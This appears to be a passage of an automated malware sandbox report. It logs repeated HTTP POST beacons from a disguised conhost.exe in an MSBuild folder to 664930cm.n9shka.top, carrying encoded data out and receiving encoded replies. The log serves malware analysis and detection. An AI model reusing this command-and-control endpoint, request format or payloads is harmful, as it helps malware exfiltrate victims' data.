                                                          94192.168.2.64980637.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:49.091048002 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:49.449748039 CEST1120OUTData Raw: 58 50 5f 5d 59 43 51 55 5c 58 57 5a 54 52 55 59 59 57 59 58 50 5a 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XP_]YCQU\XWZTRUYYWYXPZVA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT".+V!($>"!$>*1(#;'#&.V%$>+;+!F/'P,
                                                          Oct 1, 2024 05:58:49.697241068 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:49.829682112 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:49 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          95192.168.2.64980737.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:49.952128887 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:50.309144020 CEST1120OUTData Raw: 58 52 5f 5b 59 43 51 52 5c 58 57 5a 54 52 55 59 59 5a 59 5b 50 5a 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XR_[YCQR\XWZTRUYYZY[PZVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!\9#'T!];)!_311#/ 8$X W$!$':[?,T(9!F/'P,
                                                          Oct 1, 2024 05:58:50.587229967 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:50.724678040 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          96192.168.2.64980837.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:50.865602970 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:51.215244055 CEST1120OUTData Raw: 58 55 5f 5a 5c 45 54 5e 5c 58 57 5a 54 5f 55 5e 59 57 59 5c 50 5a 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XU_Z\ET^\XWZT_U^YWY\PZVA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-#/T6>=]$-$(3/,'?2%)($W?)!F/'P,9
                                                          Oct 1, 2024 05:58:51.469536066 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:51.597157001 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:51 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          97192.168.2.64980937.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:51.720716000 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:52.076356888 CEST1120OUTData Raw: 58 5d 5f 59 59 49 54 53 5c 58 57 5a 54 5d 55 5b 59 57 59 5c 50 5d 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: X]_YYITS\XWZT]U[YWY\P]VC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT".#$58;=1%3.>%</U;'Q%!&Q&.?T4(9!F/'P,1
                                                          Oct 1, 2024 05:58:52.333116055 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:52.493371010 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:52 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          98192.168.2.64981037.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:52.623450994 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          99192.168.2.64981137.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:52.877473116 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1820
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:53.230967045 CEST1820OUTData Raw: 5d 52 5f 58 5c 44 54 57 5c 58 57 5a 54 5f 55 51 59 55 59 5f 50 50 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]R_X\DTW\XWZT_UQYUY_PPVF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!_.(!;;=)&>1& /7'%292>" T?9!F/'P,9
                                                          Oct 1, 2024 05:58:53.483678102 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:53.638500929 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 26 00 33 42 2e 55 20 2c 32 07 2a 06 2b 5c 27 37 09 19 2e 2e 23 1b 31 3f 3f 5b 39 32 3e 5c 28 39 3e 5a 32 2e 05 1e 31 0b 25 0b 33 0c 20 5f 0d 10 22 11 22 06 2e 54 2d 39 0d 1a 29 31 06 07 26 30 09 11 30 0d 21 0b 3c 3e 0e 55 26 3c 29 54 33 3f 39 0c 38 1b 2f 00 2b 27 38 53 34 3b 2d 56 02 1e 22 53 26 28 39 1f 37 3f 18 04 24 28 23 04 36 3b 29 13 29 58 3b 04 33 1d 39 04 2a 13 02 05 3c 2c 2b 5e 22 14 25 5c 23 31 31 1b 27 33 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: &3B.U ,2*+\'7..#1??[92>\(9>Z2.1%3 _"".T-9)1&00!<>U&<)T3?98/+'8S4;-V"S&(97?$(#6;))X;39*<,+^"%\#11'3'\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          100192.168.2.64981237.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:52.997246981 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:53.355865002 CEST1120OUTData Raw: 58 53 5f 5e 5c 44 54 54 5c 58 57 5a 54 5f 55 50 59 57 59 57 50 5e 56 45 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XS_^\DTT\XWZT_UPYWYWP^VE[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!]-30"4*:$>.&;$,3+W'>8&>2"?"$?!F/'P,9
                                                          Oct 1, 2024 05:58:53.628072023 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:53.756694078 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          101192.168.2.64981337.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:53.890151978 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:54.246519089 CEST1120OUTData Raw: 58 55 5f 55 59 47 54 5f 5c 58 57 5a 54 5c 55 50 59 5a 59 5b 50 58 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XU_UYGT_\XWZT\UPYZY[PXVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"937!+*2)^'-11(/3+S%=4R1!141?4S()!F/'P,
                                                          Oct 1, 2024 05:58:54.496187925 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:54.625339031 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          102192.168.2.64981437.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:54.748373032 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:55.108308077 CEST1120OUTData Raw: 5d 52 5a 5e 59 42 51 54 5c 58 57 5a 54 5f 55 5b 59 55 59 5b 50 50 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]RZ^YBQT\XWZT_U[YUY[PPVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y9/"];)-\3>&^&(;Y8 3>P&!$$&+",*9!F/'P,9
                                                          Oct 1, 2024 05:58:55.382473946 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:55.515005112 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          103192.168.2.64981537.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:55.651913881 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:55.996628046 CEST1120OUTData Raw: 58 54 5f 58 59 49 51 52 5c 58 57 5a 54 5f 55 5b 59 52 59 5f 50 5a 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XT_XYIQR\XWZT_U[YRY_PZVH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!\.!]<*_$.[28 8#7'X$21=1$->1<+!F/'P,9
                                                          Oct 1, 2024 05:58:56.258166075 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:56.385241032 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          104192.168.2.64981637.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:56.513072968 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:56.872045994 CEST1120OUTData Raw: 58 56 5f 59 5c 46 54 55 5c 58 57 5a 54 52 55 5c 59 56 59 58 50 5e 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XV_Y\FTU\XWZTRU\YVYXP^VH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-3'6;;*:$>^%848 +32W2&71<"(()!F/'P,
                                                          Oct 1, 2024 05:58:57.147486925 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:57.287834883 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          105192.168.2.64981737.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:57.479830980 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:57.824647903 CEST1120OUTData Raw: 58 51 5a 5c 59 43 54 57 5c 58 57 5a 54 59 55 5a 59 5b 59 5c 50 59 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XQZ\YCTW\XWZTYUZY[Y\PYVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.U?6;)5'>5%(- 43>?%1%1"]<<<!F/'P,!
                                                          Oct 1, 2024 05:58:58.085063934 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:58.213253975 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:57 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          106192.168.2.64981837.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:58.345223904 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          107192.168.2.64981937.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:58.666356087 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1840
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:59.012113094 CEST1840OUTData Raw: 58 50 5f 5b 5c 41 54 5e 5c 58 57 5a 54 52 55 5f 59 51 59 56 50 5a 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XP_[\AT^\XWZTRU_YQYVPZVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!:'6;*2'-!2]-#$>8&.W&B:($S()!F/'P,
                                                          Oct 1, 2024 05:58:59.297585964 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:59.435758114 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 25 17 24 34 3e 57 21 2c 2d 58 29 59 23 5d 25 37 27 5d 2d 5b 33 18 25 3c 37 14 39 0c 2a 5c 3c 29 2e 11 25 3d 3b 5d 24 31 32 1e 27 26 20 5f 0d 10 21 05 22 16 29 0c 38 39 33 14 29 21 28 0a 31 1e 0d 5b 27 0a 25 0b 28 07 28 1e 30 3f 25 53 27 3f 25 0f 2c 1c 38 12 29 09 02 55 23 01 2d 56 02 1e 21 0f 26 38 26 0d 23 2f 31 1b 27 01 2b 01 21 06 35 1d 3e 10 27 04 33 1a 3a 5c 2a 2d 05 58 3f 05 23 5b 35 5c 31 5e 37 0f 31 1b 27 33 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: %$4>W!,-X)Y#]%7']-[3%<79*\<).%=;]$12'& _!")893)!(1['%((0?%S'?%,8)U#-V!&8&#/1'+!5>'3:\*-X?#[5\1^71'3'\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          108192.168.2.64982037.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:58.793203115 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
